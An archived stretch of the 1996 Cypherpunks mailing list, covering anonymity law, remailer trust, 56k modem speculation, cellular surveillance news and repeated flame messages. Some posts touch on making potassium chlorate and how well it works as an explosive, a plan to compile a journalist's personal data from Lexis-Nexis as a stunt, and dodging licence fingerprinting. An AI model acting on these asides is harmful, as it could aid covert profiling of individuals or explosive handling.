stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From froomkin at law.miami.edu Thu Sep 19 23:47:20 1996 From: froomkin at law.miami.edu (Michael Froomkin - U.Miami School of Law) Date: Fri, 20 Sep 1996 14:47:20 +0800 Subject: Fed appellate judge remarks re anonymity In-Reply-To: Message-ID: For a quick survey of anti-mask laws in the U.S. and their mixed reception in the courts see http://www.law.miami.edu/~froomkin/articles/clippern.htm#ToC54 The law is in flux here. On Thu, 12 Sep 1996, Timothy C. May wrote: > At 1:47 AM 9/13/96, Jim Choate wrote: > >Forwarded message: > > > >> Date: Thu, 12 Sep 1996 17:40:19 -0700 > >> From: Greg Broiles > >> > >> The article quotes Kozinski as saying "I have a severe problem with > >> anonymous E-mailers . . . You don't have a right to walk up to somebody's > >> door and knock with a bag over your head." The article says Kozinski likened > >> anonymous E-mail to menacing someone. > > > >I guess the esteemed judge doesn't believe in Halloween.... > **Benjamin Bradley Froomkin, b. Sept. 13, 1996, 8 lbs 14.5oz 21.5"** A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's hot here. And humid. From jamesd at echeque.com Fri Sep 20 00:00:00 1996 From: jamesd at echeque.com (James A. Donald) Date: Fri, 20 Sep 1996 15:00:00 +0800 Subject: PGP in the workplace Message-ID: <199609200503.WAA25335@dns1.noc.best.net> At 11:20 PM 9/17/96 -0400, Rick Osborne wrote: > Upon explaining to them that I was simply trying to make sure of my own > security, I was told that I was to just assume that I was secure, and that > *any* 'poking around' was found to be "highly aggravating" and could only > only "exascerbate the situation further.". > > Now, seeing as I'm fairly new to the Corporate world, but is this something > common? Not at all common in my experience, though whether this is because most bosses are more enlightened, or because most bosses are pig ignorant about security, I am not sure. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From dlv at bwalk.dm.com Fri Sep 20 00:19:27 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Fri, 20 Sep 1996 15:19:27 +0800 Subject: The periodic caveat about Timmy May In-Reply-To: <199609191920.NAA00823@InfoWest.COM> Message-ID: attila writes: > In <199609190517.HAA00851 at basement.replay.com>, on 09/19/96 > at 07:17 AM, nobody at flame.alias.net (Anonymous) said: > > = .Timmy May habitually digs into his cesspool of a mind for his > = .mailing list fertilizer. > > this is humour. it tickles the imagination, and the reference > to tim is lost! Can we get all this non-crypto-relevant shit off of this mailing list please? --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From kaye at ix.netcom.com Fri Sep 20 00:47:30 1996 From: kaye at ix.netcom.com (Kaye Caldwell) Date: Fri, 20 Sep 1996 15:47:30 +0800 Subject: ** 9/24 Ca. Dig. Sig. Working Group Meeting ** Message-ID: <199609200533.WAA28740@netcom8.netcom.com> Reposted from spki. - Bill -------- Apologies for duplicates - some of you I'm sure are on multiple notice lists for this. California Digital Signature Regulations Working Group sponsored by the Software Industry Coalition and CommerceNet THIS MEETING IS OPEN TO ANYONE WHO WISHES TO ATTEND However, please let me know if you will be attending via e-mail to: kaye at ix.netcom.com WHEN: Tuesday September 24, 1-4 PM WHERE: Sun Microsystems, 901 San Antonio Rd, (Building PAL-1) (corner of S. A. & Charleston, just off 101), Palo Alto Cancun Conference Room, 2nd Floor AGENDA I. Report on status of Secretary of State's Task Force - request for demos of technology in Sacramento II. Review of draft of our principle 1, suggestions for additional principles III. Review of current draft of outline of regulations IV. Review of draft Digital Signature Acceptance Procedures background paper V. Draft language for additional technologies For more information, e-mail Kaye Caldwell at kaye at ix.netcom.com or call 408-479-8743. Kaye Caldwell Software Industry Coalition Policy Director CommerceNet Adovocacy and Public Policy Committee Chair ------------------------------- From tcmay at got.net Fri Sep 20 01:00:27 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 20 Sep 1996 16:00:27 +0800 Subject: LEOs running anon servers? Message-ID: At 4:15 AM 9/20/96, "Michael Froomkin - U.Miami School of Law" This claim was made at a symposium held at Harvard by a sometime lecturer >at the National Defense college. He later denied it. Since lots of other >things he said in the same lecture were plainly false (more likely his >ignorance than a clever attempt to spread FUD), I wouldn't lose sleep over >it. > >Anyway, who cares -- you just use encryption and chaining and all is well. The coauthors (the other works for Science Applications) have never supplied evidence for the verbal claim, as Michael notes. From there paper, they seemed ill-informed, and apparently took most of their material from published Web pages (e.g., Raph Levien's). But I'm not as sanguine about chaining being enough. Think of it as a "percolation" problem, similar to finding a path through a network. To make this clear, if there are M remailers and N of them are "colluding" (whether NSA-controlled or working for Burger King), and one chooses O of them for a chain, what are the chances that one is compromised? To put some numbers on this, if there are 30 remailers and 15 are NSA-owned and one picks 5 remailers in a chain, there's a 3% chance that all the remailers picked are NSA-owned. And so on. A standard probability calculation. There are nuances to consider. Reputations of remailers (beliefs by others, a la Demptster-Shafer propagation of beliefs). Using one's self a remailer is always a nice touch. And so on. I do think there is almost no chance any of the "well-known" remailers are NSA or GCHQ-controlled, but the situation may change as remailers become less well-known and more fluidly instantiated, and as the NSA begins to take more serious notice of remailers than they apparently have so far. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From pgf at acadian.net Fri Sep 20 01:18:02 1996 From: pgf at acadian.net (Phil Fraering) Date: Fri, 20 Sep 1996 16:18:02 +0800 Subject: DL in exchange for fingerprint In-Reply-To: <199609200149.SAA23613@abraham.cs.berkeley.edu> Message-ID: On Thu, 19 Sep 1996, John Anonymous MacDonald wrote: > tcmay at got.net (Timothy C. May) writes: > > So, just what it is _your_ method of dealing with this? While it is noble > > to talk about fighting the system, just how do you go about doing it > > yourself? > How about just putting your finger in a cast or splint before you > renew your license? Does Nevada have the same rules as California wrt fingerprints for driver's licenses? (Of course, this concept has been rehashed a hundred times on the list even during that fraction of its existance that I have been here). Phil Fraering "And the moral of the story is, pgf at acadian.net *never count your boobies until they 318/261-9649 are hatched*." - James Thurber, "The Unicorn in the Garden" From osborne at gateway.grumman.com Fri Sep 20 01:28:47 1996 From: osborne at gateway.grumman.com (Rick Osborne) Date: Fri, 20 Sep 1996 16:28:47 +0800 Subject: CNET Digital Dispatch Vol. 2 No. 38 Message-ID: <3.0b19.32.19960920021220.0050fc50@gateway.grumman.com> This week's c|net digital dispatch had the following top ten list. For number 8, did they mean DES or is the EDS something I'm not aware of. I figure it has to be because what does DES have to do with chat rooms? >9. TOP TEN REASONS WHY THE PRESIDENTIAL DEBATES WON'T TAKE >PLACE ON THE WEB > >10. Kemp would fight with Dole over who gets to > "quarterback" the keyboard. >9. Oops: Gore plugged information superhighway cable > into White House central vacuum system. >8. Perot's crack team of EDS hackers would get him > in somehow. >7. Hotwired editors say presidential candidates not > hip enough. >6. Hillary doesn't let the President in ANY chat rooms. >5. Debate commission insists: event must be on Prodigy. >4. Bill Gates owns the rights to online debates. >3. Dole's Selectric won't connect to the Net. >2. Chelsea is using the White House PC to write a > book report. >1. In cyberspace, no one can feel your pain. ____________________________________________________________ Rick Osborne osborne at gateway.grumman.com "The universe doesn't give you any points for doing things that are easy." From jamesd at echeque.com Fri Sep 20 01:42:27 1996 From: jamesd at echeque.com (James A. Donald) Date: Fri, 20 Sep 1996 16:42:27 +0800 Subject: HipCrime as MetaSPAM Message-ID: <199609200603.XAA01570@dns1.noc.best.net> At 02:10 AM 9/15/96 -0700, Bill Stewart wrote: >5) "Anarchist Info" - sigh. Where do people get the idea that publishing >recipes for drugs and explosives is anarchist info? He didn't talk >about anarchy, or getting along without governments, or getting rid of them. >Also, he neglects to note that you can simply _buy_ potassium chlorate, >rather than having to (dangerously) boil down bleach and potassium chloride In addition: Potassium chlorate based explosives are not particularly safe or reliable, but worse than that, much worse, because of their relatively slow detonation rate, they are very ineffectual for smashing stuff and killing people, --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From robert at precipice.v-site.net Fri Sep 20 01:57:15 1996 From: robert at precipice.v-site.net (HipCrime) Date: Fri, 20 Sep 1996 16:57:15 +0800 Subject: did you go to school? In-Reply-To: <199609200537.AAA00264@smoke.suba.com> Message-ID: <324239A6.163F@precipice.v-site.net> message returned, then deleted (UNREAD) -- HTTP://www.HIPCRIME.com From stewarts at ix.netcom.com Fri Sep 20 02:27:50 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 20 Sep 1996 17:27:50 +0800 Subject: stealthy key exchange Message-ID: <199609200649.XAA13400@dfw-ix1.ix.netcom.com> At 11:37 AM 9/19/96 DST, Bodo_Moeller at public.uni-hamburg.de (Bodo Moeller) wrote: >If both have public keys, what is the point of using Diffie-Hellman? >The two channels (Alice -> Bob and Bob -> Alice) are independent, so >they can use different session keys. Alice creates a random key K_A >and sends it to Bob (encrypted with Bob's public key). Alice uses K_A Diffie-Hellman gives you forward security - if an eavesdropper copies your message and later steals your secret keys, he can't decrypt it, because there's no encrypted session key to recover. To prevent man-in-the-middle attacks, sign your half-keys with your public key. There are some problems with this method - it requires several exchanges, so it's awkward to use for email (though you can do it.) Also, it does expose the signed keyparts, which reveals the public key used for signing, though you can play games to prevent this (e.g. negotiate the key, and send the signed keyparts encrypted with the public key, though if there _is_ a man-in-the-middle, the MITM can see this, and your connection will fail.) # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From dthorn at gte.net Fri Sep 20 02:50:03 1996 From: dthorn at gte.net (Dale Thorn) Date: Fri, 20 Sep 1996 17:50:03 +0800 Subject: (fwd) Strange telephone call In-Reply-To: <199609192333.TAA25736@yakko.cs.wmich.edu> Message-ID: <32423366.3D24@gte.net> Damaged Justice wrote: > Okay, this is the story. I just received a strange telephone call. > My caller ID system shows only 'OUT_OF_AREA-----000-----'. The female > voice claimed to be taking a survey for the Department of Defense and > that she was acting as a representative of my government. She did not > say US Government or State Government, just 'your government'. > When I said that there was no way for me to verify she was what she > claimed, she gave me a business name, supervisor's name and an 800 > telephone number. She claimed this survey had to do with a Department > of Defense program named 'YATS' and told me that if my household did > not qualify, then our telephone number would be removed from the > calling list. She then ask the same question three different ways. > The question was 'Is there anyone in your household between the ages > of 16 and 24?'. When I said no for the third time, she said we did > not qualify and hung up. > So here are my questions. > Was this a legitimate call? The government should already know > exactly how many people are in my household. It is on my tax forms > every year and many other places. > Why would any government office or representative of a government > office be making cold calls to unknown telephone numbers for any kind > of survey? > Who or what is 'Westat'? This is the name of the company this woman > supposedly represented. > The telephone number given to me is 1-800-638-8778. The same woman > answered it as called me. Seems like a company doing a survey for the > government would have more than one employee. Her supervisor's name > is Chris Martin. Is she Chris Martin? In a single person office, I > guess you would be your own supervisor. The woman never gave her > personal name. > This survey was supposed to be for the Department of Defense for a > program named 'YATS'. What is YATS? > My biggest question is, Is this a new face on an old scam? Instead of > posing as the local fire department looking for donations, are the > scam-artist now posing as the government? What a way to case a home > in preparation for theft or running yet another scam of questionable > legality. Yes, I am a very suspicious person. I have seen too many > scams being run. My GTE WATS line for internet is 800-638-xxxx, so maybe they're related. From tcmay at got.net Fri Sep 20 02:50:15 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 20 Sep 1996 17:50:15 +0800 Subject: CNET Digital Dispatch Vol. 2 No. 38 Message-ID: At 6:12 AM 9/20/96, Rick Osborne wrote: >This week's c|net digital dispatch had the following top ten list. For >number 8, did they mean DES or is the EDS something I'm not aware of. I >figure it has to be because what does DES have to do with chat rooms? >>8. Perot's crack team of EDS hackers would get him >> in somehow. EDS = Electronic Data Systems, the company Perot formed in the 1960s. Acquired by General Motors, then spun off. Perot has not been connected to it for many years. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From gnu at toad.com Fri Sep 20 03:48:54 1996 From: gnu at toad.com (John Gilmore) Date: Fri, 20 Sep 1996 18:48:54 +0800 Subject: 56 kbps modems Message-ID: <199609200744.AAA07457@toad.com> I checked the Rockwell home page, which has a pointer to the press release. It isn't very technical, but gives some good clues. It looks like they're doing an interesting trick. The modems aren't designed for use like traditional modems, where the same equipment is on each end. Instead, there is a digital interface on one side of the phone call (like at an Internet Service Provider). The consumer side modem has a traditional analog interface. The rest of this is speculation and fantasy on my part. So, think about it. The analog side will generate voltages and send them to the local central office, where they will be digitized and sent to the destination central office digitally. There, they will be patched into one channel of a T1 line (out of 24) and sent digitally to the ISP's "modem bank". Equipment is already available (and in use all over the uunet network) that plugs T1 into a board full of digital signal processors, decodes each of the 24 channels (each channel running any modem signalling protocol, or ISDN), handles PPP packet framing, and gateways the resulting packets to/from an Ethernet. Now for Rockwell's trick, you get the DSP's in the two modems to talk to each other. They can run some simple coding scheme (say ordinary 2400 baud modem for this example) to pass digital data back and forth while they're negotiating the full blown deal. First, the analog side sync's up with the clock for the 8000 samples/sec that the central office is digitizing (into 8-bit samples). You can do that by sending one voltage and then switching to another; the far side can tell you whether you switched on a sample-boundary or not (was there a sample "in between" before it settled to the new value?). OK, then, in each sample slot, the analog side can send one of 256 different voltages. The digital side can tell it the 8-bit values it received. Then fine-tune that to sending 128 different voltages, taking particular care around the ones that got distorted the first time. As long as you can find 128 distinct voltage levels that the central office will reliably digitize, you're done. You're sending 7-bit samples at 8000 samples/sec. Do something similar for the analog receive side, and you can start passing user data at 56K. If the robbed-bit stuff gets in the way of seeing 128 distinct voltage levels in every byte, you can send solid zeroes or solid ones in each direction and see which bits they're stealing out of which bytes. Use most of the 8 bits available in the other bytes (you can find e.g. 200 different voltage levels that will work), and in the stolen byte, you can find e.g. 100 voltage levels that work. This is more bits than using 128 voltage levels in every byte, and in fact you can probably get closer to 64 kbits/sec than to 56 kbits/sec, depending on the analog qualities of the wire to your central office. A nice trick! It won't speed up analog-modem-to-analog-modem connections, but those will increasingly be a smaller and smaller fraction anyway, as the digital infrastructure becomes cheap. And of course the 56K modems will just be DSP's with decent A/D and D/A interfaces, so they can run all the old analog protocols too, in the case that the phone line isn't digitized, or if they want to talk to an old modem. John From bryce at digicash.com Fri Sep 20 04:28:45 1996 From: bryce at digicash.com (bryce at digicash.com) Date: Fri, 20 Sep 1996 19:28:45 +0800 Subject: other Lexis-Nexis databases Message-ID: <199609200804.KAA25534@digicash.com> -----BEGIN PGP SIGNED MESSAGE----- A brief search of www.lexis-nexis.com reveals a few interesting details: 1. You can look up people in P-TRAK by SSN. 2. There are many other databases of personal information, including: a. "REZIDE", "searchable by congressional district, area code plus exchange, county, state, metropolitan statistical area (MSA) and dominant market area (DMA)" and "providing a detailed demographic portrait [...] including age, income, race, ethnicity, household composition, employment", a "White/Blue collar index" and a "family life-cycle code". b. "DCEASE", giving information including SSN about dead people. c. An assets database identifying real-estate or FAA-registered aircraft owned by people. d. Something called "P-FIND" which is advertised as "having greater detail [than P-TRAK] with regard to the individual's household (value of home, number of dependents)". This one appears in a newsletter from 1994, so the service may be discontinued (although of course the data still exists...). It would be a fun experiment and a good cypherpunk publicity stunt to test Lexis-Nexis out. Pick a demo victim, e.g. a journalist who is honest, smart and concerned about such issues, but not one who is too famous or rich. Use Lexis-Nexis (and possibly other resources) to learn all that you can about him/her. If he/she lives in a sparsely-populated area a narrow enough REZIDE search might give income, number of persons in household, marital status, age, schooling, ethnicity, vehicles owned, and employment, and that would be with a single search. Compile everything you know and send it to the victim, explaining how you got the information. Regards, Bryce -----BEGIN PGP SIGNATURE----- Version: 2.6.2i Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2 iQB1AwUBMkJQCUjbHy8sKZitAQFb8AL/f2yQWv1R4QcftBF4khw0DZrd/szZqte3 UQ0HvjtAdjiVee7aLiumljMUqyMOzsXQlkWKh1/JXmbgVAVrsJGhZEFCyqbheUwP eqhP1QEYVHfjueQy1FlSb7U3f+VI2tzk =mky+ -----END PGP SIGNATURE----- From hvdl at sequent.com Fri Sep 20 05:32:24 1996 From: hvdl at sequent.com (Hans Unicorn Van de Looy) Date: Fri, 20 Sep 1996 20:32:24 +0800 Subject: (fwd) Strange telephone call In-Reply-To: <199609192333.TAA25736@yakko.cs.wmich.edu> Message-ID: <9609200924.AA03481@amsqnt.nl.sequent.com> The one-and-only Damaged Justice once stated: ! >From: vandy at avana.net (Vandy Terre) ! Subject: Strange telephone call ! Date: Wed, 18 Sep 1996 14:27:05 GMT ! Organization: Tanglewood Farm ! Lines: 59 ! Message-ID: <323ffe3d.188173 at news.avana.net> [ Long story deleted ] ! This survey was supposed to be for the Department of Defense for a ! program named 'YATS'. What is YATS? How about "Yet Another T* Survey"? You will have to fill in the T-word yourself :-) ! Any significantly advanced scam vandy at avana.net ! is indistinguishable ! from religion. Georgia, USA ! ! ! -- ! frogfarm at yakko.cs.wmich.edu (Damaged Justice) is officially declared Unmutual. ! "Would I had phrases that are not known, utterances that are strange, in ! new language that has not been used, free from repetition, not an ! utterance which has grown stale, which men of old have spoken." ==== _ __,;;;/ TimeWaster on http://www.IAEhv.nl/users/hvdl ============ ,;( )_, )~\| Hans "Unicorn" Van de Looy PGP: ED FE 42 22 95 44 25 D8 ;; // `--; GSM: +31 653 261 368 BD F1 55 AA 04 12 44 54 '= ;\ = | ==== finger hvdl at sequent.com for more info =================== From gary at systemics.com Fri Sep 20 06:19:37 1996 From: gary at systemics.com (Gary Howland) Date: Fri, 20 Sep 1996 21:19:37 +0800 Subject: DL in exchange for fingerprint In-Reply-To: Message-ID: <32426E55.15FB7483@systemics.com> Timothy C. May wrote: > > At 9:13 PM 9/19/96, Gary Howland wrote: > >Timothy C. May wrote: > >> > >> (Yes, I disliked being thumb-printed, but I could see no viable > >> alternative. I'm sure Duncan has some scheme to declare himself a Botswanan > >> exchange student, but I decided being thumb-printed was the lesser hassle.) > > > >Sure, it's always less hassle doing what they want. Privacy doesn't > >come for free. It's easier to let the police search you in the street > >than it is to make them arrest you so that you can make a formal > >complaint. > > So, just what it is _your_ method of dealing with this? While it is noble > to talk about fighting the system, just how do you go about doing it > yourself? Use your imagination. (hint: Do all states require thumbprints for DLs?) > (This space reserved for your lecture about how I need to be prepared to go > to jail to defend my right not to be thumbprinted, etc. On second thought, > why don't you be the one to go to jail, and then you can let us know your > experiences.) I have never seen the logic in this approach. Sure, if it's relatively easy to make a protest, then I'll do it, but going to jail out of principle is certainly more hassle for me than for "them". I would sooner demonstrate the futility of what they are trying to do, whether it be censorship or prohibition. > >Hmm - who are you paraphrasing here? (Just curious). > > "What part of "No" don't you understand?" Who said it? Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From gary at systemics.com Fri Sep 20 07:49:03 1996 From: gary at systemics.com (Gary Howland) Date: Fri, 20 Sep 1996 22:49:03 +0800 Subject: 56 kbps modems In-Reply-To: <199609200744.AAA07457@toad.com> Message-ID: <324276F2.31DFF4F5@systemics.com> Forwarded: The reason for this, Newsbytes discovered after a chat with Bill Pechey, technical director with Hayes' European operations, is that the 56,000 bps modem system is actually a digital variant. Instead of the modem using an audio channel of 3,600 hertz to the exchange, the modem works across the standard copper wiring seen on most of the world's fixed wire phone systems. In order to achieve the 56,000 bps transmission rate, the Rockwell chip-powered modem will actually physically control the codec at the telephone exchange across the copper cable. According to Pechey, if a full 4,000 hertz were available, then an ISDN (integrated service digital network) channel of 64,000 bps would be available. "Since the only 3,600 hertz of the audio channel is available through the codec, we reckon that the maximum transmission speed is around 56,000 bps. Furthermore, because of the high power levels required to achieve this transmission speed, the back channel will only operate at standard (analog) modem speeds," he told Newsbytes. Pechey told Newsbytes that this back channel will support data transfers somewhere below the 28,800 bps levels, although he noted that Rockwell claims that 28,800 bps is achievable under ideal conditions. "This means that the 56K system is best suited for Internet access, where the data is being transmitted mainly in one direction. For applications such as videoconferencing, you'd be better off looking to ISDN for a more balanced rate," he said, noting that the main advantage of 56k technology over ISDN is the price. "56K modem technology is cheaper than ISDN, since you don't need an ISDN system installed. It will work across the standard phone network using a standard phone socket," he said. According to Pechey, because the technology involved is closer to conventional analog modem systems than ISDN, adding 56K transmission technology to a standard 28,800/33,600 bps modem will not be very expensive. "Basically you'll have a black box that will work as a normal analog modem at 28,800 or 33,600 bps or whatever, but when accessing the Internet, providing the distant end of the link is a digital connection, you'll be able to use 56K in one direction, and up to 23,800 bps in the reverse direction," he said. -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From jya at pipeline.com Fri Sep 20 09:14:51 1996 From: jya at pipeline.com (John Young) Date: Sat, 21 Sep 1996 00:14:51 +0800 Subject: REJ_ect Message-ID: <199609201238.MAA05068@pipe4.ny2.usa.pipeline.com> 9-20-96. NYP Page One: "Cellular Industry Rejects U.S. Plan for Surveillance. Police Want Technology That Pinpoints Wireless Users Within a Half-Second." Markoff. The wireless communications industry voted yesterday to reject Government-backed technology that would make it possible for law enforcement agencies to keep closer tabs on cellular phone users. DoJ wants to be able for the first time to determine the location of a cellular phone caller within a half-second and almost instantly monitor the status of cellular-phone voice mail, conference calls and other wireless communications features. Yesterday's vote by a subcommittee of a network operators and manufacturers group called the Telecommunications Industry Association, came in response to a technical document the F.B.I. has been quietly circulating to industry executives since April. Known as the Electronic Surveillance Interface, the document specifies what wireless communications monitoring data must be accessible to law enforcement officials with a court warrant. ----- http://jya.com/reject.txt (8 kb) REJ_ect From dlv at bwalk.dm.com Fri Sep 20 09:25:22 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 00:25:22 +0800 Subject: [NEWS] Crypto-relevant wire clippings In-Reply-To: <19960920050709843.AAA186@GIGANTE> Message-ID: <9iZJuD12w165w@bwalk.dm.com> >From Adamsc at io-online.com Fri Sep 20 01:07:49 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Fri, 20 Sep 96 01:24:03 EDT for dlv Received: from [206.245.244.5] by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA09924 for dlv at bwalk.dm.com; Fri, 20 Sep 96 01:07:49 -0400 Received: from GIGANTE ([206.245.244.204]) by irc.io-online.com (post.office MTA v2.0 0813 ID# 285-17715) with SMTP id AAA186 for ; Thu, 19 Sep 1996 22:07:13 -0700 From: Adamsc at io-online.com (Adamsc) To: "Dr.Dimitri Vulis KOTM" Date: Thu, 19 Sep 96 22:07:34 -0800 Reply-To: "Chris Adams" X-Mailer: Chris Adams's Registered PMMail 1.52 For OS/2 X-Filtered: By PMMail 1.52 For OS/2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Subject: Re: Re: [NEWS] Crypto-relevant wire clippings Message-Id: <19960920050709843.AAA186 at GIGANTE> You are being gently flamed because. [X] you continued a boring useless stupid thread [ ] you repeatedly posted to the same thread that you just posted to [x] you repeatedly initiated incoherent, flaky, and mindless threads [x] you posted a piece riddled with profanities [ ] you advocated Net censorship [ ] you SCREAMED! (used all caps) [x] you posted some sort of crap that doesn't belong in this group [ ] you posted the inanely stupid 'Make Money Fast' article [ ] you threatened others with physical harm [x] you made a bigoted statement(s) [x] you repeatedly assumed unwarranted moral or intellectual superiority [x] you are under the misapprehension that this group is your preserve [x] you repeatedly shown lack of humor [x] you are apparently under compulsion to post to every threat [?] you are posting an anonymous attack >>> Thank you for the time you have taken to read this. Live n' Learn.<<< # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From adam at homeport.org Fri Sep 20 09:27:49 1996 From: adam at homeport.org (Adam Shostack) Date: Sat, 21 Sep 1996 00:27:49 +0800 Subject: Cellular Industry rejects US plan for surveillance Message-ID: <199609201419.JAA09136@homeport.org> Front page of todays New York Times. "But many industry executives and privacy-rights advocates disagree with the government's interpretation of the [Digital telephony] law. The industry says that the new cellular abilities would be burdensomely expensive to administer...." http://www.nytimes.com/yr/mo/day/news/financial/cellular-phone-monitor.html Login, of course, is cypherpunks, password cypherpunks Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From dlv at bwalk.dm.com Fri Sep 20 09:51:49 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 00:51:49 +0800 Subject: CIA hacked In-Reply-To: <19960920051400906.AAA199@GIGANTE> Message-ID: <0BZJuD11w165w@bwalk.dm.com> >From Adamsc at io-online.com Fri Sep 20 01:14:30 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Fri, 20 Sep 96 01:24:05 EDT for dlv Received: from [206.245.244.5] by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA10241 for dlv at bwalk.dm.com; Fri, 20 Sep 96 01:14:30 -0400 Received: from GIGANTE ([206.245.244.204]) by irc.io-online.com (post.office MTA v2.0 0813 ID# 285-17715) with SMTP id AAA199 for ; Thu, 19 Sep 1996 22:14:03 -0700 From: Adamsc at io-online.com (Adamsc) To: "Dr.Dimitri Vulis KOTM" Date: Thu, 19 Sep 96 22:14:25 -0800 Reply-To: "Chris Adams" X-Mailer: Chris Adams's Registered PMMail 1.52 For OS/2 X-Filtered: By PMMail 1.52 For OS/2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Subject: Re: Re: CIA hacked Message-Id: <19960920051400906.AAA199 at GIGANTE> You are being gently flamed because. [X] you continued a boring useless stupid thread [ ] you repeatedly posted to the same thread that you just posted to [x] you repeatedly initiated incoherent, flaky, and mindless threads [x] you posted a piece riddled with profanities [ ] you advocated Net censorship [ ] you SCREAMED! (used all caps) [x] you posted some sort of crap that doesn't belong in this group [ ] you posted the inanely stupid 'Make Money Fast' article [ ] you threatened others with physical harm [x] you made a bigoted statement(s) [x] you repeatedly assumed unwarranted moral or intellectual superiority [x] you are under the misapprehension that this group is your preserve [x] you repeatedly shown lack of humor [x] you are apparently under compulsion to post to every threat [?] you are posting an anonymous attack >>> Thank you for the time you have taken to read this. Live n' Learn.<<< # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From dlv at bwalk.dm.com Fri Sep 20 10:00:08 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 01:00:08 +0800 Subject: CIA hacked In-Reply-To: <19960920051144046.AAA184@GIGANTE> Message-ID: >From Adamsc at io-online.com Fri Sep 20 01:12:21 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Fri, 20 Sep 96 01:24:04 EDT for dlv Received: from [206.245.244.5] by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA10200 for dlv at bwalk.dm.com; Fri, 20 Sep 96 01:12:21 -0400 Received: from GIGANTE ([206.245.244.204]) by irc.io-online.com (post.office MTA v2.0 0813 ID# 285-17715) with SMTP id AAA184 for ; Thu, 19 Sep 1996 22:11:52 -0700 From: Adamsc at io-online.com (Adamsc) To: "Dr.Dimitri Vulis KOTM" Date: Thu, 19 Sep 96 22:12:08 -0800 Reply-To: "Chris Adams" X-Mailer: Chris Adams's Registered PMMail 1.52 For OS/2 X-Filtered: By PMMail 1.52 For OS/2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Subject: Re: Re: CIA hacked Message-Id: <19960920051144046.AAA184 at GIGANTE> You are being gently flamed because. [X] you continued a boring useless stupid thread [ ] you repeatedly posted to the same thread that you just posted to [x] you repeatedly initiated incoherent, flaky, and mindless threads [x] you posted a piece riddled with profanities [ ] you advocated Net censorship [ ] you SCREAMED! (used all caps) [x] you posted some sort of crap that doesn't belong in this group [ ] you posted the inanely stupid 'Make Money Fast' article [ ] you threatened others with physical harm [x] you made a bigoted statement(s) [x] you repeatedly assumed unwarranted moral or intellectual superiority [x] you are under the misapprehension that this group is your preserve [x] you repeatedly shown lack of humor [x] you are apparently under compulsion to post to every threat [?] you are posting an anonymous attack >>> Thank you for the time you have taken to read this. Live n' Learn.<<< # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From pjb at ny.ubs.com Fri Sep 20 